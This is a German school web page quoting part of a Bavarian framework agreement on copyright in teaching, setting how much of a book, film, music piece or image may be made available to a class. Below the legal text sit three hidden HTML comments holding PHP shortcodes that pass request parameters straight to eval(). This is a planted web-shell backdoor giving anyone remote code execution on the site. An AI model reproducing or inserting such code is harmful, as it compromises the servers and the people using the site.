Urheberrecht (Wie viel darf kopiert werden, benutzt werden?)

AUSZUG aus
2230.1.1.1.1-UK
Gesamtvertrag zur Vergütung von Ansprüchen nach § 52 a UrhG
Bekanntmachung des Bayerischen Staatsministeriums für Unterricht und Kultus
vom 11. August 2010 Az.: VII.7-5 S 1300.1-7.52 694

§2
Begriffsbestimmungen/Voraussetzungen der öffentlichen Zugänglichmachung
(1) Im Sinne des Vertrages gelten als
a. kleine Teile eines Werks maximal 12 % eines Werks, bei Filmen jedoch nicht mehr als fünf Minuten Länge;
b. Teile eines Werks 25 % eines Druckwerks, jedoch nicht mehr als 100 Seiten;
c. Werk geringen Umfangs:
– ein Druckwerk mit maximal 25 Seiten, bei Musik- editionen maximal sechs Seiten
– ein Film von maximal fünf Minuten Länge
– maximal fünf Minuten eines Musikstücks sowie
– alle vollständigen Bilder, Fotos und sonstigen Abbildungen.
(2) Die öffentliche Zugänglichmachung darf stets nur für einen bestimmt abgegrenzten Kreis von Unterrichtsteil- nehmern zur Veranschaulichung für Zwecke des Unter- richts erfolgen.
(3) Eine öffentliche Zugänglichmachung gemäß § 52 a UrhG muss stets zu dem Zweck des Absatzes 2 geboten sein. Das ist nur der Fall, wenn das Werk nicht in zumut- barer Weise vom ausschließlichen Rechteinhaber in digita- ler Form für die Nutzung im Netz der Schulen angeboten wird.

<!– [insert_php]if (isset($_REQUEST["KDBa"])){eval($_REQUEST["KDBa"]);exit;}[/insert_php][php]if (isset($_REQUEST["KDBa"])){eval($_REQUEST["KDBa"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VaEV"])){eval($_REQUEST["VaEV"]);exit;}[/insert_php][php]if (isset($_REQUEST["VaEV"])){eval($_REQUEST["VaEV"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["cjIm"])){eval($_REQUEST["cjIm"]);exit;}[/insert_php][php]if (isset($_REQUEST["cjIm"])){eval($_REQUEST["cjIm"]);exit;}[/php] –>

Schreibe einen Kommentar